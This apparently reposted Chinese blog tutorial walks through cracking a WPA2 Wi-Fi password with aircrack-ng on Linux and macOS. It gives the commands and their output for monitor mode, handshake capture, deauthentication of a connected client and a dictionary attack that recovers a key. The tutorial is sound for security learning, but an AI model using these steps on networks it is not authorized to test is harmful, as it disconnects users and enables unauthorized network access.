用于 Wi-Fi 密码破解
wpa-dictionary
用于 Wi-Fi 密码破解。
Linux 篇(推荐)
1. 安装 aircrack-ng
- 使用相应包管理工具安装,例如 Debian/Ubuntu 使用 apt 安装:
sudo apt install aircrack-ng
2. 查看可用的无线网卡
使用命令:airmon-ng
netcon@conwlt:~/workspace$ sudo airmon-ng
PHY Interface Driver Chipset
phy0 wlp8s0 iwlwifi Intel Corporation Centrino Wireless-N 2230 (rev c4)
根据以上输出,可用的无线网卡为 wlp8s0。
3. 指定无线网卡开启监听模式。
使用命令:airmon-ng start <网卡名称>
netcon@conwlt:~/workspace$ sudo airmon-ng start wlp8s0
PHY Interface Driver Chipset
phy0 wlp8s0 iwlwifi Intel Corporation Centrino Wireless-N 2230 (rev c4)
(mac80211 monitor mode vif enabled for [phy0]wlp8s0 on [phy0]wlp8s0mon)
(mac80211 station mode vif disabled for [phy0]wlp8s0)
根据以上输出,已经把 wlp8s0 这块无线网卡开启监听模式,开启后名字是 wlp8s0mon。
开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式。
4. 扫描附近的无线网络
使用命令:airodump-ng <处于监听模式的网卡名称>
netcon@conwlt:~/workspace$ sudo airodump-ng wlp8s0mon
CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
22:47:DA:62:2A:F0 -50 51 12 0 6 54e. WPA2 CCMP PSK AndroidAP
BSSID STATION PWR Rate Lost Frames Probe
22:47:DA:62:2A:F0 AC:BC:32:96:31:8D -31 0 -24e 0 16
这一步会输出两个列表,两个列表不停在刷新。
第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:
- BSSID: 无线 AP 的硬件地址
- PWR: 信号强度,值是负数,绝对值越小表示信号越强
- CH: 无线网络信道
- ENC: 加密方式,我们要破解的是 WPA2
- ESSID: 无线网络的名称
第二个列表表示某个无线网络中和用户设备的连接信息:
- BSSID: 无线 AP 的硬件地址
- STATION: 用户设备的硬件地址
扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。
这里仅仅是演示,所以列表只保留了一条结果。
5. 使用参数过滤扫描列表,确定扫描目标
使用命令:airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>
netcon@conwlt:~/workspace$ sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0mon
CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
22:47:DA:62:2A:F0 -33 100 1597 387 11 6 54e. WPA2 CCMP PSK AndroidAP
BSSID STATION PWR Rate Lost Frames Probe
22:47:DA:62:2A:F0 AC:BC:32:96:31:8D -32 1e-24e 1691 2657
刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49。
只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到拿到进行破解的握手包。
扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。
所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。
拿到握手包后按 Ctrl-C 结束扫描即可。
6. 使用 aireplay-ng 对目标设备发起攻击
使用命令:aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>
netcon@conwlt:~$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
18:57:31 Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6
18:57:32 Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]
18:57:33 Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]
18:57:33 Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]
...
发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl-C 退出攻击。
7. 使用 aircrack-ng 暴力破解 Wi-Fi 密码
使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>
netcon@conwlt:~/workspace$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap
Opening android-01.cap
Read 675 packets.
# BSSID ESSID Encryption
1 22:47:DA:62:2A:F0 AndroidAP WPA (1 handshake)
Choosing first network as target.
Opening android-01.cap
Reading packets, please wait...
Aircrack-ng 1.2 rc4
[00:00:00] 12/2492 keys tested (828.33 k/s)
Time left: 2 seconds 0.48%
KEY FOUND! [ 1234567890 ]
Master Key : A8 70 17 C2 C4 94 12 99 98 4B BB BE 41 23 5C 0D
4A 3D 62 55 85 64 B2 10 11 79 6C 41 1A A2 3B D3
Transient Key : 58 9D 0D 25 26 81 A9 8E A8 24 AB 1F 40 1A D9 ED
EE 10 17 75 F9 F1 01 EE E3 22 A5 09 54 A8 1D E7
28 76 8A 6C 9E FC D3 59 22 B7 82 4E C8 19 62 D9
F3 12 A0 1D E9 A4 7C 4B 85 AF 26 C5 BA 22 42 9A
EAPOL HMAC : 22 C1 BD A7 BB F4 12 A5 92 F6 30 5C F5 D4 EE BE
根据以上输出,我们已经破解成功!Wi-Fi 密码是:1234567890
8. 无线网卡退出监听模式
使用命令:airmon-ng stop <处于监听模式的无限网卡名称>
netcon@conwlt:~/workspace$ sudo airmon-ng stop wlp8s0mon
PHY Interface Driver Chipset
phy0 wlp8s0mon iwlwifi Intel Corporation Centrino Wireless-N 2230 (rev c4)
(mac80211 station mode vif enabled on [phy0]wlp8s0)
(mac80211 monitor mode vif disabled for [phy0]wlp8s0mon)
MAC OS 篇
1. 查看网卡名称
在终端中执行 ifconfig 即可查看,通常是 en0
2. 使用 airport 监听无线网络
由于某些原因,airmon-ng 无法在 MAC OS 使用,所以只能使用 airport 进行扫描和抓包了,但是并不好用,所以还是使用 linux 吧尽量...
开始扫描,终端中执行:
/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 scan
扫描结果会是这样的:
| SSID | BSSID | RSSI | CHANNEL | HT | CC | SECURITY (auth/unicast/group) |
|---|---|---|---|---|---|---|
| 小米手机 | 22:47:da:62:2a:f0 | -29 | 6 | Y | -- | WPA2(PSK/AES/AES) |
- SSID 表示 Wi-Fi 名称
- BSSID 表示 Wi-Fi 设备的硬件地址
- RSSI 表示信号强度,值是负数,绝对值越小信号越强
- CHANNEL 表示 Wi-Fi 信道
- HT 表示吞吐量模式,一般都为 Y
- CC 表示国家,中国为 CN
- SECURITY 表示加密方式
3. 使用 airport 进行抓包
sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff
抓一段儿事件之后,使用 Ctrl + C 停止抓包,完成后会生成一个 cap 包,看到如下提示:
Session saved to /tmp/airportSniff0RjCAO.cap.
4. 安装 aircrack-ng
- 使用 Homebrew 安装:
brew install aircrack-ng
5. 使用 aircrack-ng 执行破解
aircrack-ng -w common.txt /tmp/airportSniff0RjCAO.cap
Windows
下载 Aircrack-ng 提供了 Windows 的二进制包
使用 WSL
更多安装方式参考:安装 Aircrack-ng
用于 Wi-Fi 密码破解的更多相关文章
- Linux加密、安全版块、root密码破解
当一个入侵者进入了你的系统并且种植了木马,通常会想办法来隐蔽这个木马(除了木马自身的一些隐蔽特性外,他会尽量给你检查系统的过程设置障碍),通常入侵者会修改一些文件,比如管理员通常用ps -aux来查看 ...
- MD5 密码破解 碰撞 网站
MD5反向查询网站 http://www.cmd5.com/ 文件MD5值查询网站 http://www.atool.org/file_hash.php 个人对密码破解的理解 1.使用MD5对密码加密 ...
- WiFi密码破解CDlinux
好了,先说下提前要准备的东东吧:1.U盘一枚,最小1G空间.需进行格式化操作,提前保存内部文件.2.CDlinux镜像.帖子最后会提供一枚8月最新修改版,共135M. 1.CDlinux U盘启动 ...
- 【WiFi密码破解详细图文教程】ZOL仅此一份 详细介绍从CDlinux U盘启动到设置扫描破解-破解软件论坛-ZOL中关村在线
body { font-family: Microsoft YaHei UI,"Microsoft YaHei", Georgia,Helvetica,Arial,sans-ser ...
- Final——无线网络密码破解——WPA/WPA2
Final--无线网络密码破解--WPA/WPA2 20154305 齐帅 ↓ ↓ ↓ * # % & 郑 重 声 明 & % # * ↓ ↓ ↓ 本实验教程用于探索无线路由安全漏洞, ...
- WiFi密码破解详细图文教程
每天都能看到有不少网友在回复论坛之前发布的一篇破解WiFi密码的帖子,并伴随各种疑问.今天流云就为大家准备一篇实战型的文章吧,详细图文从思维CDlinux U盘启动到中文设置,如何进行路由SSID扫描 ...
- Wifi密码破解实战
原文链接地址:http://www.freebuf.com/articles/wireless/127261.html https://www.baidu.com/?tn=98012088_4_dg& ...
- linux暴力密码破解工具hydra安装与使用
说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...
- 密码破解工具John the Ripper使用说明
John the Ripper John 包描述 John the Ripper 既功能丰富又运行快速. 它在一个程序中结合了几种破解模式,并且可以根据您的特定需求进行全面地配置(你甚至可以使用支持C ...
- python-GUI-tkinter之excel密码破解工具
python gui 之熟悉tkinter部分控件使用.一个简单的excel暴力密码破解,核心很简单,基本就是一个函数外面加了GUI,写的很啰嗦,希望大家可以在优化改良下,主要是为了再熟悉下tkint ...
随机推荐
- 【Spring-Security】Re03 认证参数修改与跨域跳转处理
一.请求参数名设置 之前的表单信息有一些要求: 1.action属性发送的地址是Security设置的URL 2.发送的请求方式是POST 3.请求的账户信息,也就是表单发送的参数,必须对应的是use ...
- python语言下的迷宫游戏的实现猜想
由于本人是研究AI的,尤其是AI的强化学习方向,有时候就会对一些小游戏环境的实现有几分兴趣,因为刚看了有关reinforcement learning解决maze游戏的论文,于是就突发奇想的对这个ma ...
- 如何配置域名的 CNAME —— 添加记录集时,为什么会提示“与已有解析记录冲突”?
参考: https://support.huaweicloud.com/dns_faq/dns_faq_016.html https://developer.qiniu.com/fusion/kb/1 ...
- NVIDIA显卡原生管理查询功能nvidia-smi的部分使用功能
本文是使用NVIDIA原生管理工具查询NVIDIA显卡使用情况的一些记录(使用远程管理工具的效率没有使用原生管理接口nvml的效率高,有效率需求者建议使用python版本捆绑的nvml库,具体:htt ...
- python学习之---迭代器与生成器
什么是迭代器 可迭代对象: 可以通过for循环来实现遍历,例如list.string.dict 迭代器: 不仅可以使用for循环,还可以使用next()方法.__iter__() next():获取容 ...
- vue-表单与v-model
使用 v-model 后,表羊控件显示的值只依赖所绑定的数据,不再关心初始化时的 value 属性,对于 textarea></textarea> 之间插入的值,也不会生效. 使用 ...
- java中的几种锁
一.公平锁/非公平锁 公平锁是指多个线程按照申请锁的顺序来获取锁. 非公平锁是指多个线程获取锁的顺序并不是按照申请锁的顺序,有可能后申请的线程比先申请的线程优先获取锁.有可能,会造成优先级反转或者饥饿 ...
- css flex属性
css学的不咋熟,搞一个复杂一点的水平居中,用display 属性 + position属性 + float属性,搞了好久居然没搞出来,然后我去翻资料,发现我最不常用的flex能解决这个问题,于是我就 ...
- PowerShell 使用
Practice 常用命令 vim $PROFILE # 编辑配置文件 Get-ChildItem *> $null # 抛弃所有输出 whoami Remove-Item -Recurse - ...
- ubuntu安装过程(双系统模式)中遇到的坑
笔者在安装上win11后,看我的M.2硬盘太大,就想着以双系统方式再安装上个ubuntu,以方便以后使用.没想到和win11一样,也是连遇到挫折,一番折腾后最终才成功.下面记录下安装要点. 安装win ...